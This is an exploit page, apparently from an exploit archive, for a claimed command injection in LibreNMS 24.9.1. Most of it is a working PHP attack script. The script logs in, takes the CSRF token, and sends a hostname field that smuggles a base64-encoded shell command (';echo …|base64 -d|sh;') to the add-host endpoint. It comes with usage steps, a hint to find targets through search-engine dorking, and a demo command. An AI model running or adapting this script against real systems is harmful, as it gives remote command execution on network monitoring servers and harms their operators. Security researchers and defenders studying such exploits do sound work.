Share
## https://sploitus.com/exploit?id=PACKETSTORM:213136
=============================================================================================================================================
    | # Title     : LibreNMS 24.9.1 PHP Code Injection Vulnerability                                                                            |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.librenms.org/                                                                                                   |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking ฤฐn Google Or Other Search Enggine.
    
    [+] LibreNMS vulnerability allows remote command execution (RCE).
     
    [+] save code as poc.php .
    
    [+] USage : cmd => c:\www\test\php poc.php 
    
    [+] SeT target  = Line : 89
    
    [+] PayLoad :
    
    <?php
    
    class LibreNMSExploit {
        private $target;
        private $username;
        private $password;
        private $path;
        private $wait_time;
        private $cookie;
    
        public function __construct($target, $username, $password, $path = '/opt/librenms', $wait_time = 315) {
            $this->target = rtrim($target, '/');
            $this->username = $username;
            $this->password = $password;
            $this->path = $path;
            $this->wait_time = $wait_time;
            $this->cookie = tempnam(sys_get_temp_dir(), 'cookie_');
        }
    
        private function request($method, $uri, $data = [], $headers = []) {
            $url = "$this->target/$uri";
            $ch = curl_init();
            
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_COOKIEJAR, $this->cookie);
            curl_setopt($ch, CURLOPT_COOKIEFILE, $this->cookie);
            curl_setopt($ch, CURLOPT_CUSTOMREQUEST, strtoupper($method));
    
            if (!empty($data)) {
                curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
            }
    
            if (!empty($headers)) {
                curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
            }
    
            $response = curl_exec($ch);
            curl_close($ch);
            return $response;
        }
    
        private function getCsrfToken() {
            $response = $this->request('GET', 'login');
            preg_match('/<meta name="csrf-token" content="(.*?)"/', $response, $matches);
            return $matches[1] ?? null;
        }
    
        public function login() {
            $token = $this->getCsrfToken();
            if (!$token) {
                die("Failed to get CSRF token\n");
            }
    
            $response = $this->request('POST', 'login', [
                'username' => $this->username,
                'password' => $this->password,
                '_token'   => $token
            ]);
    
            return strpos($response, 'Devices') !== false;
        }
    
        public function executeCommand($command) {
            $payload = base64_encode($command);
            $hostPayload = ";echo $payload|base64 -d|sh;";
            
            $token = $this->getCsrfToken();
            if (!$token) {
                die("Failed to get CSRF token\n");
            }
            
            $this->request('POST', 'addhost', [
                '_token'    => $token,
                'hostname'  => $hostPayload,
                'snmp'      => 'on',
                'snmpver'   => 'v2c',
                'port'      => '',
                'transport' => 'udp',
                'force_add' => 'on'
            ]);
            
            echo "Payload sent, waiting for execution...\n";
            sleep($this->wait_time);
        }
    }
    
    // Usage
    $exploit = new LibreNMSExploit('http://target.com', 'admin', 'password');
    if ($exploit->login()) {
        echo "Login successful!\n";
        $exploit->executeCommand('id');
    } else {
        echo "Login failed!\n";
    }
    
    ?>
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================